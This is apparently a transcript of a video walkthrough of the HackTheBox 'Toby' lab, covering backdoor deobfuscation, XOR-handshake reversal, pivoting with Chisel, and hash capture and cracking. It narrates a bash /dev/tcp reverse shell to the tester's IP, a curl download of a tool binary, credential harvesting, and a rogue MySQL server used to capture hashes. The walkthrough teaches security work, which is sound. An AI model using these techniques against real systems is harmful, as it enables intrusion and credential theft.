What's going on YouTube? This is Ipsec. I'm doing Toby from HackTheBox, which is a really unique type of box because a lot of it is incident response. You're pretty much kind of reversing a bunch of bad implants from an attacker. So it starts out finding a backup to the website. You download all the source code. You can find an attacker has put a malicious line of code in the WordPress comment field. So if you leave a special comment, the server connects back to you and does a special handshake that you kind of have to reverse in order to get the server to execute commands. Once you do that, you land in a Docker environment, you do some pivoting around, eventually get to the host as a low-priv user, and find a malicious PAM backdoor, that is pluggable authentication module, I believe, and it allows for a backdoor password across all users. However, the way it does it allows you to brute force the backdoor password one character at a time. So with that being said, let's jump in. As always, we're going to start with the nmap. So -sc for default scripts, SV enumerate versions, OA output all formats, bring the nmap directory and call it Toby, and then the IP address of 10.10.11.121. This can take some time to run, so we've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. Then we have HTTP on port 80, it's running Nginx, also tells us it's Ubuntu, and the HTTP title tells us this is a WordPress site. And now this is really weird. I've never really seen WordPress running on Nginx, so I may do a little bit of Googling in the back, just like think if there's any security implications. I don't believe there are, so we're not going to show it in this video. But I mean, that stood out to me when I was doing this box. So let's go take a look at the website. Going to 10.10.11.121. We just get this weird page. And WordPress loves doing absolute URLs. So every link you can see is going to wordpress.toby.htb. So let's go and add that to our host file. So v etc host. Then we can do 10.10.11.121, toby.htb, and wordpress.toby.htb. Refresh the page, and we get a blog about horses, it looks like. And a message saying, hey, I'm back, and so are my pictures. I managed to get all of them back after the attack because I had them up in the cloud. So I'm guessing this is going to be some type of post-compromise box because there was an attack. That's what he's told us so far. We can take a look at /wp-admin and try like logging in. We can try like admin, admin horse, try some things. We don't really get anywhere, but we know subdomains are going to be a thing. So let's try doing a brute force on a subdomain. So I'm going to do gobuster vhost -u http toby.htb, the word list. We're going to do opt seclist discovery DNS. And then we want to do subdomains, top million. Let's do the top 20,000. Sure, that sounds fine. -o. We'll call it gobuster.vhost.out. And let this run while we kind of poke at it. Well, we don't even have to let it run too long. We have a backup.toby.htb. So let's take a look at this. I'm going to sudo vi etc host. We can say backup.toby.htb. See what this page is. So backup.toby.htb, and it looks like it is a GOGS instance, which is like a Git service. So think of like GitHub or GitLab, things like that. So we can try registering for an account. So I click register, and it's thinking. Let's try ipsec root at ipsec.rocks, password of password, and the captcha 869066. And we'll see if we can log in. So root at ipsec.rocks, password of password. It's thinking. And there we go. We log in. There's nothing really here. We should probably try to find a way to enumerate like the GOGS version. And I'm not sure off the top of my head. I'm just clicking all the links right now. But I'm sure if we went to like ipsec.rocks and typed in GOGS, we'd find other boxes that have used this. So maybe there's tips there, but I'm going to just look at the users. And we see there is a user called toby-admin. And we can also see the date he joined this, which may be relevant to us. Once we get a show in the box, we can like look for files created around August 28th, 2021. But the main thing is this toby-admin. And And if I look at how GOGS does my username, it's just backup.toby.htb/ipsec. So I'm going to try toby-admin, and it should bring us to his repository. And if we go to public activity, we don't see anything. So if I had created a repository, let's see if I can do that real quick. Let's see. How do I do this? I've never really actually used this software other than trying to exploit it. So my repository, let's add a new one to see exactly how this works. We'll call this one please subscribe, and then create it. And we could make it unlisted. So if you saw there was a private and unlisted, so that's pretty interesting. I'm guessing private means you need access to view it. Unlisted just means it's not going to show up in your repositories. So maybe we should try to look for unlisted repositories for toby-admin. We can see the structure. It's just ipsec/please subscribe. If I do one that doesn't exist, it gives us this 404. I do want to see if this is actually a 404 message. So curl-v, then we can do http backup.toby.htb/ipsec/junk, and then just pipe this over to less. Let's see. I think it should tell us the headers up top. If not, we'll just use whatchamacallit, Burp Suite. But no, we do see the headers. It is giving us a 404 page, so we can just run GoBuster against this. So GoBuster dir-u http backup.toby.htb/toby-admin, and then the word list of opt, seclist, discovery, web content, raft, small words.txt, and we can see if we get any actual repositories from this. And while we go to wait for that to run, we can go to toby-admin again and see if there's any types of hints. So we get his email address. We could follow him, but I don't think that's really going to do anything. It does put things in our feed, and I don't know where our feed actually is. It's probably under the dashboard. Let's see if there's anything there. Nope, we can just see our feed exists of please subscribe, the repository we created. So we do see there is a hit on backup. So if I go to /toby-admin/backup, see what we have. We have a backup repository, it looks like, and wordpress.toby.htb. So let's clone this real quick. Git clone. And then I just noticed something interesting. It looks like GitLab itself is not case sensitive. So we could have done the lowercase word list to get through a brute force a bit quicker. So if I went to ipsec, we have the please subscribe repository, right? Once this actually loads, it's all in lowercase. But if we did something crazy like please subscribe like this, it should, oh whoops, we have to say /ipsec. It should bring us to the repository because this is not case sensitive. So that is interesting. Even though this is Linux, it's not a case sensitive for the URL. But we have the backup directory. If we go here, we have WordPress. So in WordPress, I always look for the wp config. So let's cat that, cat wp config.php. And then there should be a password somewhere. Here we go. So root, and only the best secrets go in shell scripts as the password. So let's try logging into the WordPress blog now. So I'm going to try admin, post this. We can try Toby. Let's look at the user that actually wrote the post, see if it's admin or Toby. So we click here, and it should tell us the author. By Toby. So the username's Toby, and we paste that password. It didn't work. So now at this point, I'm trying to think, well, he got attacked, so I wonder if he backed up a malicious file. Like someone put a backdoor in it. So I'm going to do a search for PHP malicious file scanner, and I probably typed that. But we have this. So anytime I do like a web assessment, I always try to find like a malware scanner or something to hunt for backdoors. We could hunt for it for just grep, like grepping for dangerous functions, but really, the tools do a much better job. So let's run this. So if I do /scan, it's going to go in my current directory, so we can do a -h to see how this works. We want to specify -d for directory. So D, let's go up a directory and put it into the WordPress that we downloaded. Then let's see, base64. We probably want line number. So I'm going to do a -L as well. And we do see total malware identified 4, but we have all these OKs. So if we do the help again, there is a --hide-OK option. And now we see 4 things. So line 5712 of this file. So let's take a look. Whoops, did not mean to try to kill that. Good thing it didn't. So less than :5712. Go to this line. And this doesn't look interesting. Let's actually do VI actually, so we have syntax highlighting. If I look at 5712, I don't really see like any dangerous functions here. Like, that looks fine. If I don't see anything in any of these files, that's when I'm going to go back and look. And wp-docker.php, that sounds fishy to me. Like, is that a default WordPress file? If we look at line 121, this is doing an eval of config extra. I don't know exactly what this is, but if we can figure out how to get data into this WordPress config extra directory, we can get an eval. So that's interesting. We include this by default because reverse proxying is extremely common. Oh, so that comment is towards X-forwarded. So I'm actually, let's see. Let's do a grep-b eval on this file. B2. I'm going to Google this real quick to see if this file actually exists. Or we can just search for the name. wp-config-docker.php. Is this a legitimate file or is this malicious? It looks like it is legitimate and does indeed have an eval. So eval, if you don't know, would let you execute PHP code. So if we put PHP code in this variable, it executes it. Looks like a backdoor, but apparently that one's just WordPress. So let's go to the next one. We got comment.php line 3405. So let's do a VI 3405. And this looks like we have a winner. This is definitely malicious. We have a base64 code, rot13, and a gzip uncompress. So that looks malicious. But there's only one left, so let's take a look at this. 3036. So VI 3036. And this split string by whitespace, it doesn't look nearly as malicious as the other thing. So let's start with the comment.php. So what I'm going to do is a grep on eval of that file. Grab the very last line in case there were multiple, and I'm going to put it as malware.php. So if we look at malware.php, we can add a PHP tag, and then change this eval to a print statement. And then when we execute it, we get itself. What? Let's go to the top. Come on, where's the top? Search for PHP. Of course, PHP exists here. There we go. So this begins with A5W, and it's got eval. So I'm thinking this is just compressed over top of each other, right? Look at malware.php, A5WU. I'm going to move malware.php to Toby, make dir analyze, CP, or let's move malware to analyze, stay a bit more organized. If I run this, let's call this malware1.php, and if we If I head -1, it's going to be the same. So let's split our pane. Less malware.php, less malware1.php. So this is beginning with A5WU. This is just UW. So this is a different file. So we could try decompressing it again. So if I do v malware1.php, we replace the eval with a print like that, php malware1.php, and oh god, we have more. So let's look at malware2.php. And this is definitely different. It begins with equals, but I'm sensing like a little rabbit hole here of just a bunch of encrypted payloads, probably obfuscating like antivirus or something like that. So let's script this out. And normally I'd probably try to find some like online solution because there is a chance in this whole process that the malware actually executes on my system, because I'm only going to look for the exec statement and change that to a print. So if for some reason they decided to use eval instead of exec in one of these, it can lead to code execution on my machine. So I'd always do this in a VM. And then also I would make a snapshot before and after I run this, because this is going to be one of those really stupid things you can do. And to get things started, in Bash, you can do like math. So if I do 1 + 1 like this, we can see it echoes 2. So with that being said, I'm going to do a for I in sequence 1 through 100. So what that's going to do is loop through all the numbers 1 through 100. I'm going to sed -i to replace something in a file. We're going to search for eval, and we're going to replace it with php print, like that. And the file is going to be malware.i.php. And then we will execute php malware.i.php and direct it to malware I + 1.php. And then done. So before I run this, let's just echo what I want to do. So if I bash test.sh, maybe I need to put this in single quotes because I think I just echoed something to a file. Yeah. Okay. Well, that sucks. I probably screwed something up because now we have 100 malware files. If I look at php malware.php, that should be fine, right? Okay. So let's remove malware 0 to 9 star.php. Now we just have one. Let's create the very first one. So malware 1.php. And now when I run this test, it's going to take this one and make all the new files. So let's see what happens. So I removed the echo statements since that looked fine. And it's running. We have, looks like a lot of malware.phps, and around 79, it looks like, oh, actually 80. 80, it looks like it stops. So after 80, it's all 335. So if I cat malware 99.php, we actually have a file. So let's look at malware 99.php and vi. We can put the PHP tag so we have syntax highlighting. Then I'm also going to replace all semicolons with a new line and then a semicolon. Replace all semicolons with a semicolon, then a new line. Replace semicolon with semicolon, new line. There we go. And then we can put the PHP tag and go over this. So I'm just like trying to clean up this code. So we have an if then. I'm going to put a line break after every and. so we can see what's happening. Because we're not trying to execute this code. This is the one we're just analyzing, right? So if the comment author is help@toby.htb and the author URL is test.toby.htb and the first 8 characters equal 746 F6279, then do this. So here we're making A equal, I think, everything after 8 characters. We're going to split upon a semicolon and have host and sec. And then we're going to call this, well, include this WordPress comment validate, which I assume gives us this function. I'm guessing WP validate 403 exists in this file, and it passes these 2 variables. So let's go find backup, and I'm going to grep for validate, and we don't find anything. That sucks. Let's see, if we go back and analyze the malware, what was that file? Did I save it? Yeah, 99. So I'm going to look, well, I looked at validate, so I don't see this. We can grep-r for this. So let's grep-r 403 for A3 inside of backup. And we don't have anything. So what we're looking there is, does this function exist in our script or in the backup? It doesn't. So our backdoor doesn't look like it was backed up. So we don't have this function. So this is just a PHP script because it's including it. And then inside of this PHP script is this function. So we just got to guess what this function is. If we go here, we have leave a comment. And we have comment, name, email, website. And this wants us to have email and stuff. So let's put the email as help@toby.htb. The URL, let's put that. The name, I'm just going to put Toby, even though it did not say. We want that string first. And then we got host and security. So what I'm going to do is say 10.10.14.8, and then we put a semicolon to split these two, 9001. So here's the secret key. Here is, oh god, secret key. Then we do IP address. We're going to do us. And then I'm going to assume it talks on port 8001. I'm also going to send this to Burp Suite so we can replay this. And I just enabled dark mode on Burp Suite. If you want to do that, it's under user options, display, and the theme. But intercept is on. Let's click post comment. Send it over to repeater. And I'm going to listen on 9001. We send it. We get error 2 and nothing. So the next thing I want to do, I just want to Wireshark this real quick. So I'm going to do sudo Wireshark. I'm going to look at ton 0. And I'm actually going to kill this GoBuster because that is flooding our output. There we go. So now let's send this request. And we have 2 things. So I'm looking at every SYN packet. So SYN means we're initiating the connection. It does a SYN ACK back to us, acknowledging the SYN, and we send to ACK. So that's the TCP 3-way handshake. We can see us, we're making the request. We start with a SYN, but here we see the server initiating a SYN to us. So it's creating a separate connection right here. And we send it reset ACK because we're not listening on the port. So if we look here, we can see it's trying to connect to 20053. I bet if we click here, the source port is this ephemeral one and destination port is 20053. So I'm going to stand up a netcat on 20053. And then let's do this again, send this. And we get something. So this looks like a GUID to me. Just because like I recognize the format of hex dash hex dash hex whatever. Like this is definitely a Python GUID. Or maybe not Python, but just a GUID in general. It's a global unique identifier. So this would be like a UUID potentially, but UUIDs, they can repeat just because there's not a lot of entropy, right? But a GUID, globally unique, is meant to be unique across the whole database, so it's much longer. Then we have a bunch of text. I'm going to guess this is hex. So if I did echo this xxd-r-p, we can see it says XOR key, and then gives us more hex. So I'm going to do the same thing, echo-n, or we didn't even have that -n, we just did echo, then xxd-r-p, and we just have strings, and its entropy is 4 bits per byte. So I know this is not random. This is just ASCII. If you wanted to use like cyberchef, we could do that as well. So gchq cyberchef, go to GitHub or go to Google. Let's turn Burp Suite off. That's not the right page. Here it is. We could have done the same thing. So if we just took this whole thing, did from hex, you get this XOR key, put this. Huh, that's different. Weird. DC8. DC8. I'm not sure what's going on there. But we have this output. The one thing we don't know right now is what that second parameter was. So I'm just going to do a simple XOR real quick. And I'm going to do 9001. And we see it says key underscore prefix D key suffix. So the reason why I did 9001 is because in this, we're doing comment 10.10.14.8, and then I did port 9001, but it looks like that is the key. And it's also worth mentioning, this is hex. So I bet if I just like did not do something that was valid hex, like put a Z in here, this whole thing would break. We can try that real quick. So what we're listing on 20053, we go into Burp Suite. Let's just do Z, see what happens. We get bad requests. It doesn't even do this. It just errors out. So if I did 00, which is nothing, it's not even going to do this one XOR. It's weird. I must have changed something that I did not realize I changed. Let's try this again. ZZ. So it does come, but it does a 500 error. When it does a 500 error, does it do anything? It connects to us and doesn't send data. So if we don't give it valid hex, that's what happens. If I give it 00, it's still going to send us a GUID and then a bunch of information. And if we do this XXD thing again, or echo xxd-r-p, we get this XOR key. If we do this again, we get the key and suffix. So because we did an XOR of 0 here, then it's doing nothing. It's like rotating 0 bytes, and we don't have to worry about that XOR. So this one piece is weird now, though. It's not closing the connection after it does this, right? So if I do this, let's get this whole key. Let's grab this, see what the prefix is. If I just go to cyberchef, take this key, put it in. It is key S suffix. So what we need to do here is let's do another XOR real quick. So I'm going to open a second thing to cyberchef. And I'm going to do ID. And we're going to XOR that with, what was the key? Capital S. And I'm going to change this to be UTF-8 and :7. So if I send this :7, it's going to send me data back. And if I put this data here, this looks like it's hex. So let's from hex it. We get the output of this. It's cmd : this. So we have a way to execute commands on this box. Now, the issue is going to be if we do any complex command, we may not be as lucky and get a reverse shell because it's going to be outside of the ASCII thing. It's going to be hard to copy. So we can try this by like --c --i dev tcp 10.10.14.8/9001 like this. And I don't see any periods, so we may get lucky here. Let's just send this real quick. NC-LVNP 9001. Send that. And we get the reverse shell. We just screwed up. So let's go back to this command. We want and one like that. So if I paste this in, we get a shell. Now, I'm going to go back and script this out because it really depends what key you get, because you can rotate something into a non-ASCII value. And if you do that, then the command's just not going to work. You could just keep doing this until you get a good key that's doesn't break your command. But I'm not going to depend on that. So let's exit this out real quick. And we'll close this and create a Python script. So let's do vi-bd.py to call it like backdoor.py. And I know we could use the socket library, but I use pwn tools so much, it's just what I'm comfortable with. And I forgot to import. We can Google like pwn tools, listen, socket, and then go to the first result and see how to generally do it. We do a listen, wait for connection, and then receive line. So I'm just going to copy this because wait for connection is a pain to type. L is equal to listen. The port was 20053. Then we want to wait for connection. And then we can say R is equal to L.receive line, like that. And I'm just going to print R, and we'll see what happens. So do this. And we get a blob. So we have the GUID and this. We need to decode this and also split on a pipe. So I'm going to do, what is it? R is equal to R.decode. And then I'm going to .split on the pipe and grab the very first one. So we run this, send it again, and now we just have this blob. So we need to convert this blob into from hex to something else. And what was it? Do we have any dividers? No, we just have this. So we can do R is equal to bytes.fromHex R.decode like this. And now we need to split on a semicolon. So put this in parentheses, .split, semicolon 1. And that gives us more hex. So we can just print this out. And now we got the key suffix. So we want to split on underscore. So 0, 1, 2. And grab the second one. .split underscore 2. And now we have the XOR key. So now we can send it a command. Let us create a function. So define XOR, and I'm going to say cmd and k will be key. And I know there's probably like a list comprehension or lambda function that will be able to do this in one line, but for the sake of understanding it, I think splitting up in multiple lines is easiest. So I'm going to do for character in cmd, or we can just put this this text. Yeah, we can just do text or input. Input's a word. Let's do text. Or input's a function, like in Python. Input is a function, so that'd be a very bad one to do. Okay, so for character in text, I'm going to say output is append the following to output. And we want to take the ordinal value of the character and XOR it with the ordinal value of the key. And then convert it all into a character. So these convert it into numbers. So if I Python 3 ord a converts it into the ordinal value, and then if you char 65 converts it into the ASCII character. So that's what that's doing. Okay. So here we can now do cmd is equal to XOR. And let's do our bash command. So if I go to cyberchef, we can say this. And then the key, we're going to put, we can call this instead of R, call this key. Like that. And then l.sendLine cmd. So if this works, then this will send us a reverse shell. And this listens on the port, waits for the connection. We get GUID, blob. And then the next thing is receive, XOR, blob. And then this is receive, key, prefix, something, key, suffix. So essentially that's what this is doing. So let's try this. Is it going to work the first time? I doubt it. But it's always worth, I hope it does. Python 3, bd.py, waiting for the connection. Let's send it. And none type. Nothing has no attribute in code. Let's see. What line was that? Let's try it again. I have ZZ in my burp payload. I wonder if that was it. No. Let's go back here. Oh! In my XOR function, I'm not returning anything. I have a Z. I don't know how I keep putting that Z there. Function is not iterable. Line 20. So, does not like that l.sendLine. Print cmd. Let's just make sure I XOR something. And that's not what I wanted. I have return XOR, return output. There we go. Now this should work. The silly mistakes you make when you just like are talking and typing or just doing things. There we go. So now we have a shell. Python 3-c import pty, pty.spawn, then bash. Python command not found. Which Python? There's no Python. Which Python 3.8? ls user bin grep py. Which script? Okay, we have script. So we can do a script -q, send the script to dev null -c bash, and then control Z stty raw minus echo fg enter enter, and now we have tab autocomplete. So it's just like the Python pty, but we use script instead. Just a different way to do it. It's less characters, so maybe people prefer this way. I don't like showing this that often because the Python one sticks out more in a PS output, and in the videos, I generally don't show a bunch of OPSEC, but when we need to, we can, right? So let's export term is equal to xterm, clear the screen, and figure out what we're doing next. Our host name is WordPress. We can see that here. So chances are we're in like a Docker container or something because it's not like toby.htb. And looking at / we do see Docker environment or the .docker env, and then this entry point .sh that just starts up WordPress. And it looks like it is moving comment.php over top of the WordPress one. So this is the backdoored version, I would guess. We also have FTP started, which is weird. FTP was not on our box. So I'm going to do sslntp. Not found. Let's try netstat dash, I think ALN or something. Netstat's not found. So this Docker container is extremely minimal. We could potentially go into like the /proc, not database, but like file system or whatever this is, and go into net. And this is where all those commands like netstat, ss, let's see, IP and ifconfig aren't here. So like all these tools pull information out of this. Do we have ARP? We don't even have the ARP command. But if I cat this ARP file in procnet, we can see various hosts. So 102, 100, 103, 104. I'm going to guess our host is 103 because we have the hardware address set to all zeros. So this is most likely going to be us. Maybe it's not, but I think it is. The other files we could try, let's see. I always like putting at the top. Let's see. Wonder what dev is, if dev is anything interesting. Localhost, eth0, bytes, packets, errors. So if we looked at ifconfig thing, we have things like rx packets, bytes, things like that. So this is probably where ifconfig is pulling it from, but not good to us because it's not telling us the actual addresses. So there's probably going to be definitely one that does. I wonder what netlink is. Cat netlink. That's not it. Netstat. This one may be it, but that's a lot of information for me to go through. Wonder if we just do TCP. Or what's stat? ls stat. Let's just do TCP, and we get a lot of information. I'm going to less it with -S. Oh my god, less is not here. I was hoping to like just make it so it's just on one line, but oh well. So if I cat, what is it? TCP, we can see these are IP addresses. They're just hex encoded. So this is 7F is 127, 0, 0, and 0B in hex is 1. If we do like CyberChef, let's go here. Do this, say, from hex. I wonder if we have to say 0x. Actually, let's just do an IP converter. So hex to IP. Go to Google. convert hex to IP address, put this in, convert to IP. 0B is 11, not 1, but 127.0.0.11 is what this guy's listening. And then 9C for F. I wonder if I can just echo 0x like this. 40015 is, I think, the port. 50. This is going to be a more common port. I want to say 50 is 80 in decimal. It is. And that was listening on all host. So we have this one. This is a different IP address. We got AC45. So if we paste this, we have 172.69.0.101. And this port, what is this port? C712. This is probably going to be like it talking to MySQL. So 50962. And where was that one? We're looking at C712. It's talking to this guy on port 4E55. I think this is another high number port. 20053. So this is definitely our IP address. We're definitely 101. And if I cat arp, we're not here. So our assumption of 103 being us is wrong because we are definitely 101. I say definitely because this address is 172.69.0.101 talking to probably me. This is 0AS10, 10, 14, 8 on 253. So this is definitely us. This is a 127. This is the same. So our IP address is 101, which leaves a few. We have 102, 103, 104. So at this point, we probably should open up Chisel and set up a port forward. So I'm going to GitHub Chisel, and we'll download the Linux one. So let's see, not ARM. Where is AMD? There it is, right at the top. It has been downloaded. And then we can, do we have a www directory? We don't. We can make one. Move, downloads, Chisel, gzip-d. And then I'm just going to rename Chisel to be Chisel. Python 3-m HTTP server to download it. And I wonder if we're going to have wget or curl. We haven't had any luck with what binaries, but let's try. Wget 10.10.14.8, 8000, Chisel. Curl. We do have curl. 10.10.14.8, 8000, chisel-o, Chisel. There we go. And we have to start Chisel in server mode, but it's not executable yet. So let's make it executable. chmod +x Chisel. There we go. So we can do server-p 8001, and we want to allow reverse connections. File. Did I download the wrong one? Gosh darn it. I even said AMD, and I downloaded Darwin AMD. Linux AMD. I think I've made that mistake once before, actually. So let's move downloads Chisel to Chisel. We have to give it the gzip extension so we can decompress it. gzip-d, chmod +x Chisel. Okay, so now we can do server port 8001 reverse. There we go. That looks better. And we have it downloaded here. So chmod +x Chisel. And we can do /chisel client 10.10.14.8 8001 r:/sucks. And we have permission denied. And that's probably because dev shm has no exec. You can see that right here. So let's move chisel to temp and run that same exact command. And when we downloaded it, we downloaded the Darwin one. So let's go back to our curl, download it, then chmod it, and run it. There we go. I think we have a SOCKS proxy up. So we should be able to go to Firefox. In my Foxy proxy, I want to say I already have it configured, but we should, let's see, we can look at this configuration. That's not it. There we go. Manage extension. How do I manage this? I've done it before. Preferences. There we go. If we look at proxy 8001, we can see the SOCKS is pointed here, and it's a SOCKS 5. So this looks fine. And the IP address was 172.16.100 to like 104. So let's just see if there's any thing listening here. So 100, I'm not getting anything. 101, I'm not getting anything. Is my proxy not working? We can check that easily with sudo vi etc proxy chains.conf, and we will proxy it through proxy chains with curl. Was that 8001? Let's put a SOCKS 5, 8001. Okay. Proxy chains, curl, what was the IP? 172.69, 172.69.0.101. And we can't connect to it because I'm guessing Chisel is actually listening on 1080, not 8001. There we go. Yep, that's it. So let's just change this port to 1080. Save. And I can change proxy 8001. Let's do 1080. So if I look at the Chisel output, I'm guessing it's going to tell me what it's doing. Yeah. So Chisel itself is listening on 8001, but this is accepting clients. And if I paid attention to this, I would see it set up a SOCKS thing on port 1080. So now, with this on 1080, if I go to 172.69.101, we get the blog. So if I do 100, we get nothing. Let's try 102. Nothing. I think 103 was another one we could do. 103 is taking a little bit longer, but we still get nothing. 104. We get Jack's personal web app. So maybe we have something here. It's trying to connect to Cloudflare right now. I wonder, let's see. So where I can not do that. Let's see. Proxy. Send DNS, no. Save and edit patterns. All URLs. So let's call this one Toby, and we'll say 172.star. Save. So now we're no longer going to be sending this Cloudflare through a proxy, and it loads. But man, that is some horrible links. If we click on password generator, useful links and notes, it's still loading. Links, we get pizza. It's linking us to things. Can I change this? Well, there we go. I wonder if that was on or something. No, I had it off. Putting this on works a lot better. So we have pizza, WordPress, MySQL. This plugin I have, I think it's Dark Reader. Yeah. Notes. We can see something basic, nothing interesting. Password. Here's your password. What is my password? I am confused. Looking at this IDPW, it's making a GET request to API/password. So we can try this. And it's just giving us this string. Is it going to change? It looks like it changes every request. I'm just hitting Control-R. So, not sure what we do with this. It's just giving us a random password. I'm going to get another reverse shell on this box real quick, so we can continue enumerating through WordPress. So nclvnp 9001, if I just execute bd.py, and we go into burp suite, we should get another shell, script q dev null -c bash, stty raw -echo, fg it, export term is equal to xterm, clear, and now we can look through things. Since it's doing password, I'm going to look at this WordPress password. So if I cat wp-config.php, grep-i pass, we can see the password is still only the best secrets go in shell script. So that was the same exact thing we had from the actual source code. I'm guessing there's probably a database, though, and we can extract no less. Man, let's see. So root, DB name. So DB host is MySQL.toby.htb, and the username is root. So let's grep this. MySQL, do we have this binary? We do not, but we can proxy chains it. So proxy chains MySQL. Do we? Yeah, we have the binary. Okay. I was like, do we not have the binary on our computer? But no, we do. So MySQL, I want to say lowercase h, and we should ping MySQL.toby.htb, was it? It's really curl MySQL toby.htb. Port 80 refused. Let's see, dig. There we go. That one is 102. So 172.69.0.102. And then we can do -u root -p. And let's get that password again. Paste it in. And we log in. So we can do show databases. Use WordPress. We can also go into GOGS. So let's do show tables. Select, I think username. Let's just do describe. Hold on. Describe WP users. Select user underscore login, user underscore pass from, what was it? WP users. And we have two different hashes. So if we vi hashes.text, we can say Toby : and copy this. And then toby-admin and copy this. Okay. So the next step is to go into hashcat, and we can try to crack these hashes. So I'm going to SSH to the Kraken because I don't like cracking on my local box. We can go into hashcat, then go into hashes, hashes.text, paste these in. Then we can do hashcat and then -- user, because in the hashes file we have the user colon and then the hash. Now we specify the hashes, so hashes.text, and then the word list is opt wordlist rockU.text. So it's going to start in auto detect mode, and it detects it as a PHP pass, which is good, and it's going to try to crack them. We can see the time it's going to take. Oh, it already recovered one. If we go up, where is the one? Here we go. We have one as toby-keith1. And what's the time for the other one? It's going to finish any second now. So I'm just going to let this finish so we can see what the username is. And this is why I like doing that -- user flag now, because if I just take off the word list and do -- show, it's going to tell me toby-admin's password is toby-keith1. So we could also go in the GOGS repo and try to crack it as well, but I'm just going to try logging into GOGS with this. So if I sign out of me, sign in, was it toby-admin, and we put this credential in, we have repositories. So I'm going to clear out all this so we probably should have left that one. Reopen close tab. There we go. Because that's a different site that we know. But just cleaning up my tabs, we have two different apps, Support System DB and personal-webapp. So if we look at this, it's just a .db file. See if we go here, does it just download? View raw, save file. Let's try viewing this. So make dir support system, move, what was that file name called? Support. So downloads support system here, file, to see what type of file this is, SQLite, so SQLite 3, then .dump, and there's a lot of encrypted things. Or blobs at least. So let's see, we have user text, support submit, encrypted blob, and encrypted ID. So it looks like this whole database is pretty much encrypted. We have email, so Jack. This is the date, so this is just an epoch timestamp. But these things are encrypted blobs. So I wonder if that other application we have access to, this personal website, has anything about that. There should be a download thing, right? You can just download the whole thing as a zip. And let's move that here. So move, downloads, and what did it download as? Personal web app. Then unzip. Personal web app. Actually, make dir web app, just in case it tries to clobber our current working directory. I always like making new folders when I unzip things. And this one looks fine, so we can just move this up. And clean that up. Okay, so we have an app.py and templates. So let's take a look at the app.py. And we can see it's just a Flask application. It looks like there is a health check at API DB test. We have this API password thing. And if you remember, on this notes, I think this is where we actually hit API password. Let's make sure we're set through the proxy first. So do this, and we hit it, and we get this. So I think there's also a DB test. And access denied for Jack. Well, we don't have Jack's credentials, so we want to get them. So let's take a look at that DB test thing. And it looks like if secret DB test is in request.args and validate IP secret DB test 9EF, then hostname is equal to this. So I think we can make this connect back to us. So secret DB test. So if we do question mark secret DB test, 09EF is equal to 10.10.14.8. I think this will set our host name equal to us. So let's try this real quick. NCLVNP 3306. Run this. And we get a connection. So we can potentially extract the hash from this connection, much like any NTLM v2 thing. This is going to be MySQL, but let's see if we can extract the hash. So I'm going to do a sudo service MySQL start. I'm going to start MySQL on a box. So nc, if we do sslntp grep 3306, we can see MySQL is started. I think if I do a sudo, it'll actually tell us that is MariaDB. And now I'm going to go back to my Wireshark. So sudo Wireshark. And I'm going to look at the authentication packet. So let's send this again. And I want to do tcp.port is equal to 3306. And this is the MySQL traffic. So here's the box connecting to us. This actually translated MySQL, so we have the protocol. Host toby.htb is not allowed to connect to this MariaDB server. So we have to go edit MySQL to allow this host. So let's see, how do we do that? Sudo MySQL. Wait, what? Access denied for root. Oh, did I set a password once upon a time? That's gonna suck. So I don't know what my root password is. Let's see, MySQL reset password. Let's take our proxy off. And hope this doesn't take too long to reset. I know we put it in like safe mode and then reset it, right? So let's see. Kill MySQL, so we can just stop it. So sudo service MySQL stop. Okay. Create a password file. pw.text. Root at localhost identified by. I'm going to put the password as please subscribe. Okay. And then we set the init file. So sudo MySQLd init file is equal to, let's do home ipsec htb toby pw.text. So MySQL has started and it used that file. So let's do a sslntp grep 3306. It's still listening. If I do a sudo MySQL -p, please subscribe. Sweet, we get in. So I should have just left myself in. But now we want to create a new user. So create user jack at 10.10.11, was it 121? Let's see what the host is. Cat etsy host, grep toby. Yep, that is it. Identified by please subscribe. And I know we have the wrong password here, but this should allow Jack to be able to log into us. Flush privileges, I think, is what I have to run. And now let's restart Wireshark to clear this. And if we go back here, what does Wireshark show? We have to set the proxy. There we go. And we have a login request. This is what I wanted to see. So We have Jack. And the password is this hash, 9904. I was wondering if we have like a salt or anything. But it doesn't look like it unless it's all zeros. So that's server greeting. Ah, maybe that's the salt. We got multiple salts. This is getting confusing. But we have this password. I wonder if there's a way we can just crack this. So I'm going to Google the MySQL native password in hashcat. So MySQL native password hashcat crack. And again, we have to take this proxy off. Tell it to use Google. And it looks like we do have potentially something. And that's mode 300. I don't think that's it. Let's see. I don't see anything here. I wonder if I put the underscores. Nope. I'm going to do hashcat example hashes. And we're going to look at everything MySQL. So we have this, which is too short. And I don't think it's that version. We have 4.1 and 5. This looks okay. Do we have a version in this? So this is 10.5.9 MariaDB1. I wonder if that 5 is this. So 300 is potential. And then we have this MySQL cram. And I remember this from crypto. But we have this MySQL NA, and then this is the salt, this is the hash. And I want to say it is going to be this one. And I think we actually go to the greeting and take both of these salts and combine them, and then put this as the hash. We can kind of verify that it's actually using the salt by doing a second login request and seeing if this hash changes. If this hash changes, then we know we need more information than just a hash to crack this. I always forget to put this back on. So now, let's see, we have login request Jack. We do this one. So it begins with 994. This is 94A. So this hash is changing. So we know we need more information than just this because the salt is changing what the password is. So I'm going to take both of these. So can I just copy value? Let's see. Yep. So I'm going to do MySQL.text. I'll call this actually MySQL toby.txt. Paste that. And let's get this other salt right here. And we can copy the value. And if we go to the hashcat example hashes, we need to put this before it. And then we put, I think we put a star, not a dollar. And now we can put the hash. So let's go to the login request, grab this, copy, value, and put this. And I think that is correct. I'm going to cat it, and then we'll put it over on the Kraken and see if we can crack it. So copy, SSH Kraken. Let's go back into hashcat. V hashes, I'll call this toby.text, I guess. And then we want to do /hashcat -mode. This is going to be 11200. We probably don't have to specify this because of auto detection. Hashes toby.text, opt wordlist rocku.txt. And see if we get anything. And token length exception. So it did not like this. V hashes toby.text. I wonder if we could convert this into hex. Because that's kind of how this is showing, is that is definitely in hex. So MySQL NA dollar this stir that. I don't think so, but that is certainly possible. Where is a Wireshark? I wish there was a salt in this. Client capabilities, no. So let's see. I'm going to copy this value. Then let's go and convert that into hex on CyberChef. So GCHQ, CyberChef, turn off. Input 2 hex. That looks short. I'm going to have to put both of them. We can just change the delimiter. Instead of doing that, delimiter none. There we go. So what is it saying this length is? So echo-n, wc-c, that is 40. So that's definitely a SHA-1 sum. Unless, like, I just got unlucky with that. This is not. That's 24. So if I did both of these salts, that's server capabilities, copy, value. Does this now magically become 40 characters? Echo-n. I think it does. That is looking promising. So let's try adding 